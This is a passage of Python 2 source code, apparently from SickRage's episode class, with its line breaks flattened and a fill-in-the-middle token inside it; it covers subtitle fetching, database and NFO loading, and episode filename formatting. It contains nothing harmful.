#logging.getLogger('subliminal').addHandler(logging.StreamHandler()) #logging.getLogger('subliminal').setLevel(logging.DEBUG) try: languages = set() for language in frozenset(subtitles.wantedLanguages()).difference(self.subtitles): languages.add(subtitles.fromietf(language)) if not languages: logger.log(u'%s: No missing subtitles for S%02dE%02d' % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return providers = sickbeard.subtitles.getEnabledServiceList() vname = self.location video = None try: # Never look for subtitles in the same path, as we specify the path later on video = subliminal.scan_video(vname, subtitles=False, embedded_subtitles=not sickbeard.EMBEDDED_SUBTITLES_ALL or not force) except Exception: logger.log(u'%s: Exception caught in subliminal.scan_video for S%02dE%02d' % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return if not video: return # TODO: Add gui option for hearing_impaired parameter ? foundSubs = subliminal.download_best_subtitles([video], languages=languages, providers=providers, single=not sickbeard.SUBTITLES_MULTI, hearing_impaired=False) if not foundSubs: logger.log(u'%s: No subtitles found for S%02dE%02d on any provider' % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return # Select the correct subtitles path if sickbeard.SUBTITLES_DIR and ek.ek(os.path.exists, sickbeard.SUBTITLES_DIR): subs_new_path = sickbeard.SUBTITLES_DIR elif sickbeard.SUBTITLES_DIR: subs_new_path = ek.ek(os.path.join, ek.ek(os.path.dirname, self.location), sickbeard.SUBTITLES_DIR) dir_exists = helpers.makeDir(subs_new_path) if not dir_exists: logger.log(u'Unable to create subtitles folder ' + subs_new_path, logger.ERROR) else: helpers.chmodAsParent(subs_new_path) else: subs_new_path = ek.ek(os.path.join, ek.ek(os.path.dirname, self.location)) subliminal.save_subtitles(foundSubs, directory=subs_new_path, single=not sickbeard.SUBTITLES_MULTI) for video, subs in foundSubs.iteritems(): for sub in subs: # Get the file name out of video.name and use the path from above video_path = subs_new_path + "/" + video.name.rsplit("/", 1)[-1] subpath = subliminal.subtitle.get_subtitle_path(video_path, sub.language if sickbeard.SUBTITLES_MULTI else None) helpers.chmodAsParent(subpath) helpers.fixSetGroupID(subpath) if not sickbeard.EMBEDDED_SUBTITLES_ALL and sickbeard.SUBTITLES_EXTRA_SCRIPTS and self.location.endswith(('mkv','mp4')): subtitles.run_subs_extra_scripts(self, foundSubs) except Exception as e: logger.log("Error occurred when downloading subtitles for: %s" % self.location) logger.log(traceback.format_exc(), logger.ERROR) return self.refreshSubtitles() self.subtitles_searchcount += 1 if self.subtitles_searchcount else 1 self.subtitles_lastsearch = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") self.saveToDB() newSubtitles = frozenset(self.subtitles).difference(previous_subtitles) if newSubtitles: subtitleList = ", ".join([subtitles.fromietf(newSub).name for newSub in newSubtitles]) logger.log(u"%s: Downloaded %s subtitles for S%02dE%02d" % (self.show.indexerid, subtitleList, self.season, self.episode), logger.DEBUG) notifiers.notify_subtitle_download(self.prettyName(), subtitleList) else: logger.log(u"%s: No subtitles downloaded for S%02dE%02d" % (self.show.indexerid, self.season, self.episode), logger.DEBUG) if sickbeard.SUBTITLES_HISTORY: for video, subs in foundSubs.iteritems(): for sub in subs: logger.log(u'history.logSubtitle %s, %s' % (sub.provider_name, sub.language.opensubtitles), logger.DEBUG) history.logSubtitle(self.show.indexerid, self.season, self.episode, self.status, sub) return self.subtitles def checkForMetaFiles(self): oldhasnfo = self.hasnfo oldhastbn = self.hastbn cur_nfo = False cur_tbn = False # check for nfo and tbn if ek.ek(os.path.isfile, self.location): for cur_provider in sickbeard.metadata_provider_dict.values(): if cur_provider.episode_metadata: new_result = cur_provider._has_episode_metadata(self) else: new_result = False cur_nfo = new_result or cur_nfo if cur_provider.episode_thumbnails: new_result = cur_provider._has_episode_thumb(self) else: new_result = False cur_tbn = new_result or cur_tbn self.hasnfo = cur_nfo self.hastbn = cur_tbn # if either setting has changed return true, if not return false return oldhasnfo != self.hasnfo or oldhastbn != self.hastbn def specifyEpisode(self, season, episode): sqlResult = self.loadFromDB(season, episode) if not sqlResult: # only load from NFO if we didn't load from DB if ek.ek(os.path.isfile, self.location): try: self.loadFromNFO(self.location) except exceptions.NoNFOException: logger.log(u"%s: There was an error loading the NFO for episode S%02dE%02d" % (self.show.indexerid, season, episode), logger.ERROR) # if we tried loading it from NFO and didn't find the NFO, try the Indexers if not self.hasnfo: try: result = self.loadFromIndexer(season, episode) except exceptions.EpisodeDeletedException: result = False # if we failed SQL *and* NFO, Indexers then fail if not result: raise exceptions.EpisodeNotFoundException("Couldn't find episode S%02dE%02d" % (season, episode)) def loadFromDB(self, season, episode): logger.log(u"%s: Loading episode details from DB for episode %s S%02dE%02d" % (self.show.indexerid, self.show.name, season, episode), logger.DEBUG) myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?", [self.show.indexerid, season, episode]) if len(sqlResults) > 1: raise exceptions.MultipleDBEpisodesException("Your DB has two records for the same show somehow.") elif len(sqlResults) == 0: logger.log(u"%s: Episode S%02dE%02d not found in the database" % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return False else: # NAMEIT logger.log(u"AAAAA from" + str(self.season)+"x"+str(self.episode) + " -" + self.name + " to " + str(sqlResults[0]["name"])) if sqlResults[0]["name"]: self.name = sqlResults[0]["name"] self.season = season self.episode = episode self.absolute_number = sqlResults[0]["absolute_number"] self.description = sqlResults[0]["description"] if not self.description: self.description = "" if sqlResults[0]["subtitles"] and sqlResults[0]["subtitles"]: self.subtitles = sqlResults[0]["subtitles"].split(",") self.subtitles_searchcount = sqlResults[0]["subtitles_searchcount"] self.subtitles_lastsearch = sqlResults[0]["subtitles_lastsearch"] self.airdate = datetime.date.fromordinal(int(sqlResults[0]["airdate"])) # logger.log(u"1 Status changes from " + str(self.status) + " to " + str(sqlResults[0]["status"]), logger.DEBUG) self.status = int(sqlResults[0]["status"] or -1) # don't overwrite my location if sqlResults[0]["location"] and sqlResults[0]["location"]: self.location = os.path.normpath(sqlResults[0]["location"]) if sqlResults[0]["file_size"]: self.file_size = int(sqlResults[0]["file_size"]) else: self.file_size = 0 self.indexerid = int(sqlResults[0]["indexerid"]) self.indexer = int(sqlResults[0]["indexer"]) sickbeard.scene_numbering.xem_refresh(self.show.indexerid, self.show.indexer) try: self.scene_season = int(sqlResults[0]["scene_season"]) except: self.scene_season = 0 try: self.scene_episode = int(sqlResults[0]["scene_episode"]) except: self.scene_episode = 0 try: self.scene_absolute_number = int(sqlResults[0]["scene_absolute_number"]) except: self.scene_absolute_number = 0 if self.scene_absolute_number == 0: self.scene_absolute_number = sickbeard.scene_numbering.get_scene_absolute_numbering( self.show.indexerid, self.show.indexer, self.absolute_number ) if self.scene_season == 0 or self.scene_episode == 0: self.scene_season, self.scene_episode = sickbeard.scene_numbering.get_scene_numbering( self.show.indexerid, self.show.indexer, self.season, self.episode ) if sqlResults[0]["release_name"] is not None: self.release_name = sqlResults[0]["release_name"] if sqlResults[0]["is_proper"]: self.is_proper = int(sqlResults[0]["is_proper"]) if sqlResults[0]["version"]: self.version = int(sqlResults[0]["version"]) if sqlResults[0]["release_group"] is not None: self.release_group = sqlResults[0]["release_group"] self.dirty = False return True def loadFromIndexer(self, season=None, episode=None, cache=True, tvapi=None, cachedSeason=None): if season is None: season = self.season if episode is None: episode = self.episode logger.log(u"%s: Loading episode details from %s for episode S%02dE%02d" % (self.show.indexerid, sickbeard.indexerApi(self.show.indexer).name, season, episode) , logger.DEBUG) indexer_lang = self.show.lang try: if cachedSeason is None: if tvapi is None: lINDEXER_API_PARMS = sickbeard.indexerApi(self.indexer).api_params.copy() if not cache: lINDEXER_API_PARMS['cache'] = False if indexer_lang: lINDEXER_API_PARMS['language'] = indexer_lang if self.show.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True t = sickbeard.indexerApi(self.indexer).indexer(**lINDEXER_API_PARMS) else: t = tvapi myEp = t[self.show.indexerid][season][episode] else: myEp = cachedSeason[episode] except (sickbeard.indexer_error, IOError), e: logger.log(u"" + sickbeard.indexerApi(self.indexer).name + " threw up an error: " + ex(e), logger.DEBUG) # if the episode is already valid just log it, if not throw it up if self.name: logger.log(u"" + sickbeard.indexerApi( self.indexer).name + " timed out but we have enough info from other sources, allowing the error", logger.DEBUG) return else: logger.log(u"" + sickbeard.indexerApi(self.indexer).name + " timed out, unable to create the episode", logger.ERROR) return False except (sickbeard.indexer_episodenotfound, sickbeard.indexer_seasonnotfound): logger.log(u"Unable to find the episode on " + sickbeard.indexerApi( self.indexer).name + "... has it been removed? Should I delete from db?", logger.DEBUG) # if I'm no longer on the Indexers but I once was then delete myself from the DB if self.indexerid != -1: self.deleteEpisode() return if getattr(myEp, 'episodename', None) is None: logger.log(u"This episode %s - S%02dE%02d has no name on %s" %(self.show.name, season, episode, sickbeard.indexerApi(self.indexer).name)) # if I'm incomplete on TVDB but I once was complete then just delete myself from the DB for now if self.indexerid != -1: self.deleteEpisode() return False if getattr(myEp, 'absolute_number', None) is None: logger.log(u"This episode %s - S%02dE%02d has no absolute number on %s" %(self.show.name, season, episode, sickbeard.indexerApi(self.indexer).name), logger.DEBUG) else: logger.log(u"%s: The absolute_number for S%02dE%02d is: %s " % (self.show.indexerid, season, episode, myEp["absolute_number"]), logger.DEBUG) self.absolute_number = int(myEp["absolute_number"]) self.name = getattr(myEp, 'episodename', "") self.season = season self.episode = episode sickbeard.scene_numbering.xem_refresh(self.show.indexerid, self.show.indexer) self.scene_absolute_number = sickbeard.scene_numbering.get_scene_absolute_numbering( self.show.indexerid, self.show.indexer, self.absolute_number ) self.scene_season, self.scene_episode = sickbeard.scene_numbering.get_scene_numbering( self.show.indexerid, self.show.indexer, self.season, self.episode ) self.description = getattr(myEp, 'overview', "") firstaired = getattr(myEp, 'firstaired', None) if not firstaired or firstaired == "0000-00-00": firstaired = str(datetime.date.fromordinal(1)) rawAirdate = [int(x) for x in firstaired.split("-")] try: self.airdate = datetime.date(rawAirdate[0], rawAirdate[1], rawAirdate[2]) except (ValueError, IndexError): logger.log(u"Malformed air date of %s retrieved from %s for (%s - S%02dE%02d)" % (firstaired, sickbeard.indexerApi(self.indexer).name, self.show.name, season, episode),logger.WARNING) # if I'm incomplete on the indexer but I once was complete then just delete myself from the DB for now if self.indexerid != -1: self.deleteEpisode() return False # early conversion to int so that episode doesn't get marked dirty self.indexerid = getattr(myEp, 'id', None) if self.indexerid is None: logger.log(u"Failed to retrieve ID from " + sickbeard.indexerApi(self.indexer).name, logger.ERROR) if self.indexerid != -1: self.deleteEpisode() return False # don't update show status if show dir is missing, unless it's missing on purpose if not ek.ek(os.path.isdir, self.show._location) and not sickbeard.CREATE_MISSING_SHOW_DIRS and not sickbeard.ADD_SHOWS_WO_DIR: logger.log(u"The show dir %s is missing, not bothering to change the episode statuses since it'd probably be invalid" % self.show._location ) return if self.location: logger.log(u"%s: Setting status for S%02dE%02d based on status %s and location %s" % (self.show.indexerid, season, episode, statusStrings[self.status], self.location), logger.DEBUG) if not ek.ek(os.path.isfile, self.location): if self.airdate >= datetime.date.today() or self.airdate == datetime.date.fromordinal(1): logger.log(u"Episode airs in the future or has no airdate, marking it %s" % statusStrings[UNAIRED], logger.DEBUG) self.status = UNAIRED elif self.status in [UNAIRED, UNKNOWN]: # Only do UNAIRED/UNKNOWN, it could already be snatched/ignored/skipped, or downloaded/archived to disconnected media logger.log(u"Episode has already aired, marking it %s" % statusStrings[self.show.default_ep_status], logger.DEBUG) self.status = self.show.default_ep_status if self.season > 0 else SKIPPED # auto-skip specials else: logger.log(u"Not touching status [ %s ] It could be skipped/ignored/snatched/archived" % statusStrings[self.status], logger.DEBUG) # if we have a media file then it's downloaded elif sickbeard.helpers.isMediaFile(self.location): # leave propers alone, you have to either post-process them or manually change them back if self.status not in Quality.SNATCHED_PROPER + Quality.DOWNLOADED + Quality.SNATCHED + [ARCHIVED]: logger.log( u"5 Status changes from " + str(self.status) + " to " + str(Quality.statusFromName(self.location)), logger.DEBUG) self.status = Quality.statusFromName(self.location, anime=self.show.is_anime) # shouldn't get here probably else: logger.log(u"6 Status changes from " + str(self.status) + " to " + str(UNKNOWN), logger.DEBUG) self.status = UNKNOWN def loadFromNFO(self, location): if not ek.ek(os.path.isdir, self.show._location): logger.log( str(self.show.indexerid) + u": The show dir is missing, not bothering to try loading the episode NFO") return logger.log( str(self.show.indexerid) + u": Loading episode details from the NFO file associated with " + location, logger.DEBUG) self.location = location if self.location != "": if self.status == UNKNOWN: if sickbeard.helpers.isMediaFile(self.location): logger.log(u"7 Status changes from " + str(self.status) + " to " + str( Quality.statusFromName(self.location, anime=self.show.is_anime)), logger.DEBUG) self.status = Quality.statusFromName(self.location, anime=self.show.is_anime) nfoFile = sickbeard.helpers.replaceExtension(self.location, "nfo") logger.log(str(self.show.indexerid) + u": Using NFO name " + nfoFile, logger.DEBUG) if ek.ek(os.path.isfile, nfoFile): try: showXML = etree.ElementTree(file=nfoFile) except (SyntaxError, ValueError), e: logger.log(u"Error loading the NFO, backing up the NFO and skipping for now: " + ex(e), logger.ERROR) # TODO: figure out what's wrong and fix it try: ek.ek(os.rename, nfoFile, nfoFile + ".old") except Exception, e: logger.log( u"Failed to rename your episode's NFO file - you need to delete it or fix it: " + ex(e), logger.ERROR) raise exceptions.NoNFOException("Error in NFO format") for epDetails in showXML.getiterator('episodedetails'): if epDetails.findtext('season') is None or int(epDetails.findtext('season')) != self.season or \ epDetails.findtext('episode') is None or int( epDetails.findtext('episode')) != self.episode: logger.log(u"%s: NFO has an <episodedetails> block for a different episode - wanted S%02dE%02d but got S%02dE%02d" % (self.show.indexerid, self.season, self.episode, epDetails.findtext('season'), epDetails.findtext('episode') ), logger.DEBUG) continue if epDetails.findtext('title') is None or epDetails.findtext('aired') is None: raise exceptions.NoNFOException("Error in NFO format (missing episode title or airdate)") self.name = epDetails.findtext('title') self.episode = int(epDetails.findtext('episode')) self.season = int(epDetails.findtext('season')) sickbeard.scene_numbering.xem_refresh(self.show.indexerid, self.show.indexer) self.scene_absolute_number = sickbeard.scene_numbering.get_scene_absolute_numbering( self.show.indexerid, self.show.indexer, self.absolute_number ) self.scene_season, self.scene_episode = sickbeard.scene_numbering.get_scene_numbering( self.show.indexerid, self.show.indexer, self.season, self.episode ) self.description = epDetails.findtext('plot') if self.description is None: self.description = "" if epDetails.findtext('aired'): rawAirdate = [int(x) for x in epDetails.findtext('aired').split("-")] self.airdate = datetime.date(rawAirdate[0], rawAirdate[1], rawAirdate[2]) else: self.airdate = datetime.date.fromordinal(1) self.hasnfo = True else: self.hasnfo = False if ek.ek(os.path.isfile, sickbeard.helpers.replaceExtension(nfoFile, "tbn")): self.hastbn = True else: self.hastbn = False def __str__(self): toReturn = "" toReturn += "%s - S%02dE%02d - %s " % (self.show.name, self.season, self.episode, self.name ) + "\n" toReturn += "location: " + str(self.location) + "\n" toReturn += "description: " + str(self.description) + "\n" toReturn += "subtitles: " + str(",".join(self.subtitles)) + "\n" toReturn += "subtitles_searchcount: " + str(self.subtitles_searchcount) + "\n" toReturn += "subtitles_lastsearch: " + str(self.subtitles_lastsearch) + "\n" toReturn += "airdate: " + str(self.airdate.toordinal()) + " (" + str(self.airdate) + ")\n" toReturn += "hasnfo: " + str(self.hasnfo) + "\n" toReturn += "hastbn: " + str(self.hastbn) + "\n" toReturn += "status: " + str(self.status) + "\n" return toReturn def createMetaFiles(self): if not ek.ek(os.path.isdir, self.show._location): logger.log(str(self.show.indexerid) + u": The show dir is missing, not bothering to try to create metadata") return self.createNFO() self.createThumbnail() if self.checkForMetaFiles(): self.saveToDB() def createNFO(self): result = False for cur_provider in sickbeard.metadata_provider_dict.values(): result = cur_provider.create_episode_metadata(self) or result return result def createThumbnail(self): result = False for cur_provider in sickbeard.metadata_provider_dict.values(): result = cur_provider.create_episode_thumb(self) or result return result def deleteEpisode(self): logger.log(u"Deleting %s S%02dE%02d from the DB" % (self.show.name, self.season, self.episode), logger.DEBUG) # remove myself from the show dictionary if self.show.getEpisode(self.season, self.episode, noCreate=True) == self: logger.log(u"Removing myself from my show's list", logger.DEBUG) del self.show.episodes[self.season][self.episode] # delete myself from the DB logger.log(u"Deleting myself from the database", logger.DEBUG) myDB = db.DBConnection() sql = "DELETE FROM tv_episodes WHERE showid=" + str(self.show.indexerid) + " AND season=" + str( self.season) + " AND episode=" + str(self.episode) myDB.action(sql) raise exceptions.EpisodeDeletedException() def get_sql(self, forceSave=False): """ Creates SQL queue for this episode if any of its data has been changed since the last save. forceSave: If True it will create SQL queue even if no data has been changed since the last save (aka if the record is not dirty). """ try: if not self.dirty and not forceSave: logger.log(str(self.show.indexerid) + u": Not creating SQL queue - record is not dirty", logger.DEBUG) return myDB = db.DBConnection() rows = myDB.select( 'SELECT episode_id, subtitles FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?', [self.show.indexerid, self.season, self.episode]) epID = None if rows: epID = int(rows[0]['episode_id']) if epID: # use a custom update method to get the data into the DB for existing records. # Multi or added subtitle or removed subtitles if sickbeard.SUBTITLES_MULTI or not rows[0]['subtitles'] or not self.subtitles: return [ "UPDATE tv_episodes SET indexerid = ?, indexer = ?, name = ?, description = ?, subtitles = ?, " "subtitles_searchcount = ?, subtitles_lastsearch = ?, airdate = ?, hasnfo = ?, hastbn = ?, status = ?, " "location = ?, file_size = ?, release_name = ?, is_proper = ?, showid = ?, season = ?, episode = ?, " "absolute_number = ?, version = ?, release_group = ? WHERE episode_id = ?", [self.indexerid, self.indexer, self.name, self.description, ",".join(self.subtitles), self.subtitles_searchcount, self.subtitles_lastsearch, self.airdate.toordinal(), self.hasnfo, self.hastbn, self.status, self.location, self.file_size, self.release_name, self.is_proper, self.show.indexerid, self.season, self.episode, self.absolute_number, self.version, self.release_group, epID]] else: # Don't update the subtitle language when the srt file doesn't contain the alpha2 code, keep value from subliminal return [ "UPDATE tv_episodes SET indexerid = ?, indexer = ?, name = ?, description = ?, " "subtitles_searchcount = ?, subtitles_lastsearch = ?, airdate = ?, hasnfo = ?, hastbn = ?, status = ?, " "location = ?, file_size = ?, release_name = ?, is_proper = ?, showid = ?, season = ?, episode = ?, " "absolute_number = ?, version = ?, release_group = ? WHERE episode_id = ?", [self.indexerid, self.indexer, self.name, self.description, self.subtitles_searchcount, self.subtitles_lastsearch, self.airdate.toordinal(), self.hasnfo, self.hastbn, self.status, self.location, self.file_size, self.release_name, self.is_proper, self.show.indexerid, self.season, self.episode, self.absolute_number, self.version, self.release_group, epID]] else: # use a custom insert method to get the data into the DB. return [ "INSERT OR IGNORE INTO tv_episodes (episode_id, indexerid, indexer, name, description, subtitles, " "subtitles_searchcount, subtitles_lastsearch, airdate, hasnfo, hastbn, status, location, file_size, " "release_name, is_proper, showid, season, episode, absolute_number, version, release_group) VALUES " "((SELECT episode_id FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?)" ",?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?);", [self.show.indexerid, self.season, self.episode, self.indexerid, self.indexer, self.name, self.description, ",".join(self.subtitles), self.subtitles_searchcount, self.subtitles_lastsearch, self.airdate.toordinal(), self.hasnfo, self.hastbn, self.status, self.location, self.file_size, self.release_name, self.is_proper, self.show.indexerid, self.season, self.episode, self.absolute_number, self.version, self.release_group]] except Exception as e: logger.log(u"Error while updating database: %s" % (repr(e)), logger.ERROR) def saveToDB(self, forceSave=False): """ Saves this episode to the database if any of its data has been changed since the last save. forceSave: If True it will save to the database even if no data has been changed since the last save (aka if the record is not dirty). """ if not self.dirty and not forceSave: logger.log(str(self.show.indexerid) + u": Not saving episode to db - record is not dirty", logger.DEBUG) return logger.log(str(self.show.indexerid) + u": Saving episode details to database", logger.DEBUG) logger.log(u"STATUS IS " + str(self.status), logger.DEBUG) newValueDict = {"indexerid": self.indexerid, "indexer": self.indexer, "name": self.name, "description": self.description, "subtitles": ",".join(self.subtitles), "subtitles_searchcount": self.subtitles_searchcount, "subtitles_lastsearch": self.subtitles_lastsearch, "airdate": self.airdate.toordinal(), "hasnfo": self.hasnfo, "hastbn": self.hastbn, "status": self.status, "location": self.location, "file_size": self.file_size, "release_name": self.release_name, "is_proper": self.is_proper, "absolute_number": self.absolute_number, "version": self.version, "release_group": self.release_group } controlValueDict = {"showid": self.show.indexerid, "season": self.season, "episode": self.episode} # use a custom update/insert method to get the data into the DB myDB = db.DBConnection() myDB.upsert("tv_episodes", newValueDict, controlValueDict) def fullPath(self): if self.location == None or self.location == "": return None else: return ek.ek(os.path.join, self.show.location, self.location) def createStrings(self, pattern=None): patterns = [ '%S.N.S%SE%0E', '%S.N.S%0SE%E', '%S.N.S%SE%E', '%S.N.S%0SE%0E', '%SN S%SE%0E', '%SN S%0SE%E', '%SN S%SE%E', '%SN S%0SE%0E' ] strings = [] if not pattern: for p in patterns: strings += [self._format_pattern(p)] return strings return self._format_pattern(pattern) def prettyName(self): """ Returns the name of this episode in a "pretty" human-readable format. Used for logging and notifications and such. Returns: A string representing the episode's name and season/ep numbers """ if self.show.anime and not self.show.scene: return self._format_pattern('%SN - %AB - %EN') elif self.show.air_by_date: return self._format_pattern('%SN - %AD - %EN') return self._format_pattern('%SN - %Sx%0E - %EN') def _ep_name(self): """ Returns the name of the episode to use during renaming. Combines the names of related episodes. Eg. "Ep Name (1)" and "Ep Name (2)" becomes "Ep Name" "Ep Name" and "Other Ep Name" becomes "Ep Name & Other Ep Name" """ multiNameRegex = "(.*) \(\d{1,2}\)" self.relatedEps = sorted(self.relatedEps, key=lambda x: x.episode) if len(self.relatedEps) == 0: goodName = self.name else: goodName = '' singleName = True curGoodName = None for curName in [self.name] + [x.name for x in self.relatedEps]: match = re.match(multiNameRegex, curName) if not match: singleName = False break if curGoodName == None: curGoodName = match.group(1) elif curGoodName != match.group(1): singleName = False break if singleName: goodName = curGoodName else: goodName = self.name for relEp in self.relatedEps: goodName += " & " + relEp.name return goodName def _replace_map(self): """ Generates a replacement map for this episode which maps all possible custom naming patterns to the correct value for this episode. Returns: A dict with patterns as the keys and their replacement values as the values. """ ep_name = self._ep_name() def dot(name): return helpers.sanitizeSceneName(name) def us(name): return re.sub('[ -]', '_', name) def release_name(name): if name: name = helpers.remove_non_release_groups(helpers.remove_extension(name)) return name def release_group(show, name): if name: name = helpers.remove_non_release_groups(helpers.remove_extension(name)) else: return "" try: np = NameParser(name, showObj=show, naming_pattern=True) parse_result = np.parse(name) except (InvalidNameException, InvalidShowException), e: logger.log(u"Unable to get parse release_group: " + ex(e), logger.DEBUG) return '' if not parse_result.release_group: return '' return parse_result.release_group epStatus, epQual = Quality.splitCompositeStatus(self.status) # @UnusedVariable if sickbeard.NAMING_STRIP_YEAR: show_name = re.sub("\(\d+\)$", "", self.show.name).rstrip() else: show_name = self.show.name #try to get the release group rel_grp = {}; rel_grp["SiCKRAGE"] = 'SiCKRAGE'; if hasattr(self, 'location'): #from the location name rel_grp['location'] = release_group(self.show, self.location); if (rel_grp['location'] == ''): del rel_grp['location'] if hasattr(self, '_release_group'): #from the release group field in db rel_grp['database'] = self._release_group; if (rel_grp['database'] == ''): del rel_grp['database'] if hasattr(self, 'release_name'): #from the release name field in db rel_grp['release_name'] = release_group(self.show, self.release_name); if (rel_grp['release_name'] == ''): del rel_grp['release_name'] # use release_group, release_name, location in that order if ('database' in rel_grp): relgrp = 'database' elif ('release_name' in rel_grp): relgrp = 'release_name' elif ('location' in rel_grp): relgrp = 'location' else: relgrp = 'SiCKRAGE' return { '%SN': show_name, '%S.N': dot(show_name), '%S_N': us(show_name), '%EN': ep_name, '%E.N': dot(ep_name), '%E_N': us(ep_name), '%QN': Quality.qualityStrings[epQual], '%Q.N': dot(Quality.qualityStrings[epQual]), '%Q_N': us(Quality.qualityStrings[epQual]), '%S': str(self.season), '%0S': '%02d' % self.season, '%E': str(self.episode), '%0E': '%02d' % self.episode, '%XS': str(self.scene_season), '%0XS': '%02d' % self.scene_season, '%XE': str(self.scene_episode), '%0XE': '%02d' % self.scene_episode, '%AB': '%(#)03d' % {'#': self.absolute_number}, '%XAB': '%(#)03d' % {'#': self.scene_absolute_number}, '%RN': release_name(self.release_name), '%RG': rel_grp[relgrp], '%AD': str(self.airdate).replace('-', ' '), '%A.D': str(self.airdate).replace('-', '.'), '%A_D': us(str(self.airdate)), '%A-D': str(self.airdate), '%Y': str(self.airdate.year), '%M': str(self.airdate.month), '%D': str(self.airdate.day), '%0M': '%02d' % self.airdate.month, '%0D': '%02d' % self.airdate.day, '%RT': "PROPER" if self.is_proper else "", } def _format_string(self, pattern, replace_map): """ Replaces all template strings with the correct value """ result_name = pattern # do the replacements for cur_replacement in sorted(replace_map.keys(), reverse=True): result_name = result_name.replace(cur_replacement, helpers.sanitizeFileName(replace_map[cur_replacement])) result_name = result_name.replace(cur_replacement.lower(), helpers.sanitizeFileName(replace_map[cur_replacement].lower())) return result_name def _format_pattern(self, pattern=None, multi=None, anime_type=None): """ Manipulates an episode naming pattern and then fills the template in """ if pattern == None: pattern = sickbeard.NAMING_PATTERN if multi == None: multi = sickbeard.NAMING_MULTI_EP if sickbeard.NAMING_CUSTOM_ANIME: if anime_type == None: anime_type = sickbeard.NAMING_ANIME else: anime_type = 3 replace_map = self._replace_map() result_name = pattern # if there's no release group in the db, let the user know we replaced it if (not hasattr(self, '_release_group') and (not replace_map['%RG'] == 'SiCKRAGE')): logger.log(u"Episode has no release group, replacing it with '" + replace_map['%RG'] + "'", logger.DEBUG); self._release_group = replace_map['%RG'] #if release_group is not in the db, put it there elif ((self._release_group == '') and (not replace_map['%RG'] == 'SiCKRAGE')): logger.log(u"Episode has no release group, replacing it with '" + replace_map['%RG'] + "'", logger.DEBUG); self._release_group = replace_map['%RG'] #if release_group is not in the db, put it there # if there's no release name then replace it with a reasonable facsimile if not replace_map['%RN']: if self.show.air_by_date or self.show.sports: result_name = result_name.replace('%RN', '%S.N.%A.D.%E.N-' + replace_map['%RG']) result_name = result_name.replace('%rn', '%s.n.%A.D.%e.n-' + replace_map['%RG'].lower()) elif anime_type != 3: result_name = result_name.replace('%RN', '%S.N.%AB.%E.N-' + replace_map['%RG']) result_name = result_name.replace('%rn', '%s.n.%ab.%e.n-' + replace_map['%RG'].lower()) else: result_name = result_name.replace('%RN', '%S.N.S%0SE%0E.%E.N-' + replace_map['%RG']) result_name = result_name.replace('%rn', '%s.n.s%0se%0e.%e.n-' + replace_map['%RG'].lower()) logger.log(u"Episode has no release name, replacing it with a generic one: " + result_name, logger.DEBUG) if not replace_map['%RT']: result_name = re.sub('([ _.-]*)%RT([ _.-]*)', r'\2', result_name) # split off ep name part only name_groups = re.split(r'[\\/]', result_name) # figure out the double-ep numbering style for each group, if applicable for cur_name_group in name_groups: season_format = sep = ep_sep = ep_format = None season_ep_regex = ''' (?P<pre_sep>[ _.-]*) ((?:s(?:eason|eries)?\s*)?%0?S(?![._]?N)) (.*?) (%0?E(?![._]?N)) (?P<post_sep>[ _.-]*) ''' ep_only_regex = '(E?%0?E(?![._]?N))' # try the normal way season_ep_match = re.search(season_ep_regex, cur_name_group, re.I | re.X) ep_only_match = re.search(ep_only_regex, cur_name_group, re.I | re.X) # if we have a season and episode then collect the necessary data if season_ep_match: season_format = season_ep_match.group(2) ep_sep = season_ep_match.group(3) ep_format = season_ep_match.group(4) sep = season_ep_match.group('pre_sep') if not sep: sep = season_ep_match.group('post_sep') if not sep: sep = ' ' # force 2-3-4 format if they chose to extend if multi in (NAMING_EXTEND, NAMING_LIMITED_EXTEND, NAMING_LIMITED_EXTEND_E_PREFIXED): ep_sep = '-' regex_used = season_ep_regex # if there's no season then there's not much choice so we'll just force them to use 03-04-05 style elif ep_only_match: season_format = '' ep_sep = '-' ep_format = ep_only_match.group(1) sep = '' regex_used = ep_only_regex else: continue # we need at least this much info to continue if not ep_sep or not ep_format: continue # start with the ep string, eg. E03 ep_string = self._format_string(ep_format.upper(), replace_map) for other_ep in self.relatedEps: # for limited extend we only append the last ep if multi in (NAMING_LIMITED_EXTEND, NAMING_LIMITED_EXTEND_E_PREFIXED) and other_ep != self.relatedEps[ -1]: continue elif multi == NAMING_DUPLICATE: # add " - S01" ep_string += sep + season_format elif multi == NAMING_SEPARATED_REPEAT: ep_string += sep # add "E04" ep_string += ep_sep if multi == NAMING_LIMITED_EXTEND_E_PREFIXED: ep_string += 'E' <|fim▁hole|> if self.absolute_number == 0: curAbsolute_number = self.episode else: curAbsolute_number = self.absolute_number if self.season != 0: # dont set absolute numbers if we are on specials ! if anime_type == 1: # this crazy person wants both ! (note: +=) ep_string += sep + "%(#)03d" % { "#": curAbsolute_number} elif anime_type == 2: # total anime freak only need the absolute number ! (note: =) ep_string = "%(#)03d" % {"#": curAbsolute_number} for relEp in self.relatedEps: if relEp.absolute_number != 0: ep_string += '-' + "%(#)03d" % {"#": relEp.absolute_number} else: ep_string += '-' + "%(#)03d" % {"#": relEp.episode} regex_replacement = None if anime_type == 2: regex_replacement = r'\g<pre_sep>' + ep_string + r'\g<post_sep>' elif season_ep_match: regex_replacement = r'\g<pre_sep>\g<2>\g<3>' + ep_string + r'\g<post_sep>' elif ep_only_match: regex_replacement = ep_string if regex_replacement: # fill out the template for this piece and then insert this piece into the actual pattern cur_name_group_result = re.sub('(?i)(?x)' + regex_used, regex_replacement, cur_name_group) # cur_name_group_result = cur_name_group.replace(ep_format, ep_string) # logger.log(u"found "+ep_format+" as the ep pattern using "+regex_used+" and replaced it with "+regex_replacement+" to result in "+cur_name_group_result+" from "+cur_name_group, logger.DEBUG) result_name = result_name.replace(cur_name_group, cur_name_group_result) result_name = self._format_string(result_name, replace_map) logger.log(u"formatting pattern: " + pattern + " -> " + result_name, logger.DEBUG) return result_name def proper_path(self): """ Figures out the path where this episode SHOULD live according to the renaming rules, relative from the show dir """ anime_type = 